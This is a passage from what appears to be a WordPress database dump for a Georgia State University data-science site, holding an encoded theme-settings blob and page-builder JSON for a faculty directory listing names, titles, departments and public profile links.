Tfte+XzA+AN-lPBtRnTLXPYirwlWbNSKmbubqvQS0w5TOtPRaAz4UgQJlkPuMcs5OYncTs5DFmJ-WeKb96RJRfjZRfzE4yvTPlF7Z0I6T8YnZyrJTfDzN7-9ioarMmYSkVNcGuCUvRHSPPJCz1aLi-AC8lLDVyfwedhffJ-dUnx-3VJ879ddMaAfphWcR5NJ0+nlLaUg-P-9XI-91D2pLw82Jh0ydh9JssLb2HTtBcUOoi6TdZWnpF-D2qguly8a1z4sbO4+TRnfptEaUE6JVNC3dFmCVZ7s7lt5N-SEHgnADVgfvLpPlnNyq-gZvswiwLm7aBnZMYTi9Qg2HzZjsaqcGY2HwbNXjirPNJvYh5ExrAhBkgcIlpTExjYhoTqcJIFUaqMFKFkSqMVGGkCiNVGJPxmIwfTzJ+z1RhPSKqsEaqMCbjmX7rDtcaqcKYjB9rMv4-cRpFHQFuBRR2TsJLstvW1vodbW2tkTU86Oy7T9awPjnWsD5x1nA1nRGg-1rObU6Ans9sOp2d1CbXengKsUYKMWpxv+cxY16317VBJjEm3N+WcL+vLPC75dzmXuiWKw+okowxYTDtjml3TLtj2h3T7ph2x7Q7pt0x7Y5pd0y7Y9od0+5jSrubPXPgzYg48AY58Jh2ZwbemHY3yIHHtPsxp93FM2n3wpazh-jOg6c0eA2Km10z8HrHDLyB95OBN0iDH3Qi3icN3pwcDd6cOA3+ys1sBOj5LHuYnlTi3QxPgjdIgkcS-ImS4E3wupw8kuAxJ-+2nHxlnoduBcMMPGbgMQOPGXjMwGMGHjPwmIHHDDxm4DEDjxl4zMCPKQO-Z+K7GRHx3SDxHTPwzLyV+G6Q+I4Z+NGq0OdxOrVJk3Y3UksF-tdFtEPe3dBd8+7viPlukPk+6PS7T+a7OTnmuzlx5ns1nxGgF7MsOams+-B0d4N0d6S7v+MxA-RVdHcXN8PUOqbW36Av79ap6SxLMLGOiXVMrGNiHRPrmFjHxDom1jGxjol1TKxjYh0T6yNKrAPdL7Ud6Hio7UCR2o6JdaBvpLYDRWo7JtbHmljPl5PH64XNwyhJipbeDnWm3VATBNLsRnA3sFuiHej7IbgDRYL7oNPxHgnuQE+N4N5W54km2r8sJ48E6OdqhjuhTDvQwfntQJHfvodM+09RVrgMe4EpdowB7D8GEOw5BhCMKAYQYAwAYwBUvjUGIDEGgDGAkcYAvkTFbG7TrzaJW2U7w5QRgu4KsRe7ev7yHXn+Ej3-ISdhtU-PX52c569OXdouJkA7c9tJ+f56eN9fo++P2nYnqW0H1LwOgG8IAvARgP8WAH7esc1vl2m5XNgkiRGLj1h8xOIjFh+x+IjFRyw+YvERi49YfMTiIxYf8-BjysMzut88PKPjycMzinl4zMMz9sY8PGOYh8c8-HHm4TmBS0afycN-TOLv1rsKZ8tZI3QHioGAHeH3wY5JeMbeTxKeMUzCDzkDwx6T8Gz8TKmeSXgGp52E-5jE3y0BehXOlrNTSsAzPngCno2JvIIyd4jB7z1mxKuy7EwQzLJjlv2VWfYisnk4c5n2ZVIWBC5tkhC4JPzyJirD2UVURvk8TuOijMPzZFmUUV78liaPhF+U+TIiIO18QfiHWZRnH9MyLh--FT0SfrHMUwIBP0tiAgE-uymm14s8u4mTiEDAz87Os7Oz8-9MS373YWl5pvmH6WMZnYur4k4Xs-T87P6vv-4Km8ffRY8PWT4tCL+I3KoaAC3C2XLWXJLl8W2cEn7x5Zfzn6---cfHL-+9-v2-nz+e-fzx7OL651+ufv-ty3+bq+shQ-gFbQ666vhlSvhFpGSgeABeEFnuiYAyb2K08KbAAgFKsUko2vviKeEXf-75z-bIIkqS8yzPo7CMs-RjaidJNK0rrZ7LB4vgIgwCYRAIg0AYBMIgEAaBMAiEQSAMAmEQCINAGATCII4eBrFnOQI2IjkChnIECIMA9lY5AoZyBAiDGO9ef1laZGkjRMADpY3yF+kuEAi1KwTiHekQMNQhGHT23acOATs5HQKmTn2rvywtspQA-X1m80V0UiiI4WUIGMoQ-BgUxAnhDl7H7mfI7kfcwVu313Ombjmz+SLyzEQFwrKJRX4-JrYxsY2JbUxsY2IbE9uY2MbENia2MbGNiW1MbD9-9cvXPXfF5nPrR7u-AQicE4B4SgAIP2O6OpDY9NYdIgDT6MYuk7K5evqY2nkcuvM3Nikid7x8XETNTU32BIi6+P8Fp+i3arwHAA==\"\n            }\n        },\n        \"type\": \"theme_mod\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2024-11-07 17:31:49\"\n    }\n}','','','trash','closed','closed','','1917fa4e-34d6-40d9-a043-0c8da3f9f0c5','','','2024-11-07 12:31:50','2024-11-07 17:31:50','',0,'https://gsudice.dataconn.net/?p=1851',0,'customize_changeset','',0),(1852,1,'2024-11-07 12:31:50','2024-11-07 17:31:50','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c64\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Faris-e1697216253732.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1814,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Faris Hawamdeh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":2,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Academic Professional<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/faris-hawamdeh\\/?trk=public_profile_publication_contributor-image\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/faris-hawamdeh\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Faris-Hawamdeh\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c69\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"1